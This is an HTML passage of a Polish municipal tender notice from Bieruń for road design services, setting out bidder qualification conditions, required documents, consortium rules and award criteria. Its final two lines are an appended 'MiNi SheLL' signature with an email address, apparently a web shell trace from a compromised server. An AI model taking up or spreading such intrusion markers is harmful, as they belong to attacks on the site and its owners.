2)	oświadczenie Wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać  poświadczenia, o którym mowa wyżej.

W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w wykazie zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa wyżej.
Przy ocenie spełnienia warunku za wykonane, Zamawiający uzna te opracowania, które zostały wykonane (tj. zakończone i odebrane protokołami końcowymi) w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.
W razie konieczności, szczególnie, gdy wykaz lub dowody budzą wątpliwości Zamawiającego lub gdy z poświadczenia lub z innego dowodu wynika, że zamówienie nie zostało wykonane lub nie zostało wykonane należycie, Zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio Zamawiającemu. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ocena oferty nastąpi łącznie tzn. należy wykazać, że wymagany warunek spełnia przynajmniej jeden z Wykonawców w całej rozciągłości.
W przypadku, gdy Wykonawca polega na zasobach innych podmiotów przy wykazaniu spełnienia warunku wiedzy i doświadczenia należy wykazać udział tych podmiotów w wykonaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. ocena nastąpi  łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia.
Dysponują co najmniej jedną osobą, która posiada uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej, a w przedmiotowym zamówieniu będzie uczestniczyć w wykonaniu zamówienia. 
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę:
	- oświadczenia (zgodnie z art. 22 ust.1 pkt 3 ustawy pzp);
	- dokumentu wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, posiadających uprawnienia (uprawnienia do projektowania bez ograniczeń w zakresie specjalności drogowej) wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. ocena nastąpi  łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W ubieganiu się o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki dotyczące:
Sytuacji ekonomicznej i finansowej.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie przedłożonego przez Wykonawcę:
	- oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia. ocena nastąpi  łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.	Lista wymaganych oświadczeń
Wykonawca przystępujący do postępowania złoży oświadczenie z art. 22 ust. 1 ustawy pzp, że spełnia warunki dotyczące:
1.	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
2.	Posiadania wiedzy i doświadczenia.
3.	Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia.
4.	Sytuacji ekonomicznej i finansowej.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu Wykonawcy. 
Jeżeli Wykonawca reprezentowany jest w postępowaniu przez pełnomocnika do oferty należy załączyć  pełnomocnictwo, w formie oryginału lub notarialnie poświadczonej kopii.
B. Inne dokumenty
1.	Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dostarcza oświadczenia i dokumenty wymienione w SIWZ pkt.V. A Lista wymaganych oświadczeń oraz w pkt.V.B Lista wymaganych dokumentów.
Zamiast dokumentu, o których mowa w punkcie 3 Listy wymaganych dokumentów, przedstawia dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości  (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa wyżej.
2.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
3.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku innych podmiotów, na zasobach których Wykonawca polega na zasadach określonych w art.26
4.	ust. 2b ustawy pzp, kopie dokumentów dotyczących odpowiednio Wykonawcy lub podmiotów są poświadczane za zgodność z oryginałem odpowiednio przez Wykonawcę lub te podmioty.
5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.
Treść zobowiązania podmiotu trzeciego złożonego w oryginale, powinna określać w szczególności:
a)	kto jest podmiotem przyjmującym zasoby,
b)	zakres zobowiązania podmiotu trzeciego (wskazanie konkretnych zasobów podmiotu trzeciego, którymi Wykonawca będzie dysponował przy realizacji zamówienia),
c)	czego konkretnie dotyczy zobowiązanie oraz w jaki sposób będzie zobowiązanie wykonane przy realizacji zamówienia (w realizacji której części zamówienia będzie brał udział podmiot trzeci w jakiej formie np. podwykonawstwo),
d)	jakiego okresu dotyczy zobowiązanie.
W sytuacji, gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia. 
Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnie  zasobów nie ponosi winy.
5.	Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnienie opisanego przez Zamawiającego warunku.
6.	Podmioty występujące wspólnie
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia 
(np. konsorcjum/spółki cywilnej) do oferty należy dołączyć: 
1.	Pełnomocnictwo  określające zasady reprezentacji ze wskazaniem pełnomocnika (lidera), jego zakresu działania i uprawnień do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. 
Pełnomocnictwo winno zawierać, w szczególności:
a)	nazwy wszystkich Wykonawców wspólnie ubiegający się o realizację zamówienia i udzielających pełnomocnictwa, 
b)	nazwę firmy Pełnomocnika/Lidera,
c)	zakres działania Pełnomocnika/Lidera, uprawnień do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy, 
d)	czas trwania (zawiązania umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia tzn. co najmniej okres obejmujący realizację zamówienia),
e)	cel zawarcia (wspólny udział w przetargu i wspólna realizacja zamówienia publicznego),
f)	datę udzielenia pełnomocnictwa,
g)	odpisy wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodne z zasadą ich reprezentacji.
Pełnomocnictwo należy załączyć w formie oryginału lub notarialnie poświadczonej kopii. 
Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem/Liderem. 
2)	Oświadczenia wymienione w SIWZ punkcie V.A SIWZ powinny być złożone w taki sposób, aby warunki, o których mowa w punkcie IV SIWZ, Wykonawcy występujący wspólnie spełnili łącznie.
3)	Dokumenty wymienione w SIWZ pkt. V.B. ppkt. 1 i 2  Listy wymaganych dokumentów powinny być złożone w taki sposób, aby warunki o których mowa w pkt. IV SIWZ, Wykonawcy występujący wspólnie spełnili łącznie.
4)	Dokumenty wymienione w SIWZ  pkt. V B ppkt. 3,4,5 Listy wymaganych dokumentów składa każdy z Wykonawców wchodzących w skład podmiotu występującego wspólnie.
5)	Zgodnie z art. 141 ustawy pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.
C. Do oferty należy załączyć informacje w zakresie części zamówienia, które zostaną powierzone podwykonawcom lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy pzp, w celu wykazania spełnienia warunków  udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy pzp.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z Wykonawcą umowy w zakresie:
1)	wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany zgodnie z obowiązującą stawką;
2)	zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy z zachowaniem wymagań określonych  w umowie, jakie osoby te powinny spełniać;
3)	zmiany podwykonawcy lub powierzenia podwykonawcy części zakresu zamówienia 
w przypadku wystąpienia okoliczności, których nie można było przewidzieć na etapie sporządzania oferty.
Jeżeli zmiana lub rezygnacja podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art., 26 ust. 2b ustawy Prawo zamówień publicznych, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust.1 ww. ustawy, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.
4)	mającym wpływ na realizację przedmiotu umowy, w przypadku:
a) zmiany powszechnie obowiązujących przepisów prawa,
 b) przedłużających się procedur administracyjnych niezależnych od Wykonawcy;
5)	zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, a które nie wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu, 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2016 godzina 11:00, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter), 43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com